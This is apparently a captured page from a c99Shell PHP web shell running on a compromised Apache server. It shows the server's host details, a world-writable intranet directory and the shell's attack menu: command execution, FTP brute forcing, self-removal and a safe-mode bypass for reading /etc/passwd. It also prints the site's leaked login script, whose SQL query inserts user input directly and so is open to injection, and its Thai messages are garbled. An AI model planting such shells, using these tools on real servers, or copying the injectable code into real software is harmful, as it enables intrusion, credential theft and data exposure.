110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/intranet/ drwxrwxrwx Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/intranet/ drwxrwxrwx
Free 52.82 GB of 127.8 GB (41.33%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?

session_start();

include_once('config.php');



//  Check From Logout Page

if ($status == "logout") {

        header("Location: login.php");

        session_destroy();

        $status = "logout";

}

else {

            // Trim input box

            $txtUser = trim($txtUser);

            $txtPwd = trim($txtPwd);



            connDB();

            $sql =    "select * from wp_users where user_id = '$txtUser' ";

            $rs = mysql_query($sql);

            if (mysql_num_rows($rs) > 0) {

                $row = mysql_fetch_array($rs);

                $password = $row[user_pass];

                $gid = $row[gid];

                $pwdCrypt = crypt($txtPwd, $password);

                mysql_free_result($rs);                    // free user result

                if ($password == $pwdCrypt) {

                /******************************************************************************************************

                ***  Session Regist and Redirect to user page

                ******************************************************************************************************/



                        $_SESSION['gid'] = $gid;

                        $_SESSION['login'] = "True";



                        print "Redirect to ...";

                        switch ($gid) {

                        case 1:

                            header("Location: main.php?user=$row[uid]");

                            break;

                        case 2:

                            header("Location: home.php?user=$row[uid]");

                            break;

                        case 3:

                            header("Location: guest.php");

                            break;

                        default:

                            msgbox_loc("дБиѕєЎЕШиБјЩйгЄй№Хйг№ГРєє","login.php");

                            session_destroy();

                        }

                    }

                    else {

                        msgbox_loc("ГЛСКјиТ№дБи¶ЩЎаўйТГРєєдґй","login.php");

                        session_destroy();

                            }

            }

            else {

                    msgbox_loc("дБиКТБТГ¶аўйТГРєєдґй","login.php");

                    session_destroy();

                }

                                                                                              

} // end if check logout page

?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: